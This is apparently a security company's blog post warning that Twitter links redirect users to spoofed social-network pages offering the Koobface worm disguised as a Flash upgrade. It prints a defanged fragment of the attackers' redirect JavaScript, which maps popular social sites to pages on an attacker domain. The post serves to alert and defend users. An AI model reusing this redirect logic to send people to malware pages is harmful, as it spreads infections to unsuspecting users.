Tertwit? or Twitter Tweet Links Redirect to Koobface

koob-Face or ter-Twit? The ongoing abuse of twitter feeds by malware distributors continues to net more social networking victims. As always, be wary of any executable you are prompted to download and execute. Currently, evil tweets for “My home video :) ” or “cool video! WOW!” redirect to a set of spoofed social network pages. The malicious pages present visiting users with a prompt for a plugin install, “Flash player upgrade required”. An example here:

The malicious Koobace worm that ThreatFire has been preventing on desktops is served up and named “setup.exe” from this site. Interestingly, a number of these ip addresses serving up Koobface have been in use by Waledac distributors.

The ThreatFire community has been reporting the Koobface nastiness being served from multiple web servers today, with fairly heavy Koobface volume from web servers hosted on these ip addresses:

Update: Thankfully, as the malware distributors have changed some of their tweet tactics, their web server at kukuruku-290709. com has been pulled out from under them. Here is an example portion of javascript (mods mine) hosted on redirect pages that examines the victim’s search url, and based on a list of extremely popular social networking sites, redirects them to a variety of spoofed pages:

// KROTEGvar
abc1 = 'hxxp://kukuruku-290709. com/go/';
var abc2 = 'hxxp://kukuruku-290709. com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook. com',  abc+'fb.php'],
['tagged. com',    abc+'tg.php'],
['friendster. com',abc+'fr.php'],
['myspace. com',   abc+'ms.php'],
['msplinks. com',  abc+'ms.php'],
['myyearbook. com',abc+'yb.php'],
['fubar. com',     abc+'fu.php'],
['twitter. com',   abc+'tw.php'],
['hi5. com',       abc+'hi5.php'],
['bebo. com',      abc+'be.php']];

Again, if you are a user of these sites and receive a tweet from someone you don’t know that redirects you to a page that serves up an executable download, be very suspicious. And of course, run a behavioral-based solution like ThreatFire as a layer on your system.

This entry was posted in The Law. Bookmark the permalink.

One Response to Tertwit? or Twitter Tweet Links Redirect to Koobface

  1. Roseann Dukette says:

    ohhh awesome info

Leave a Reply

Your email address will not be published. Required fields are marked *


You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>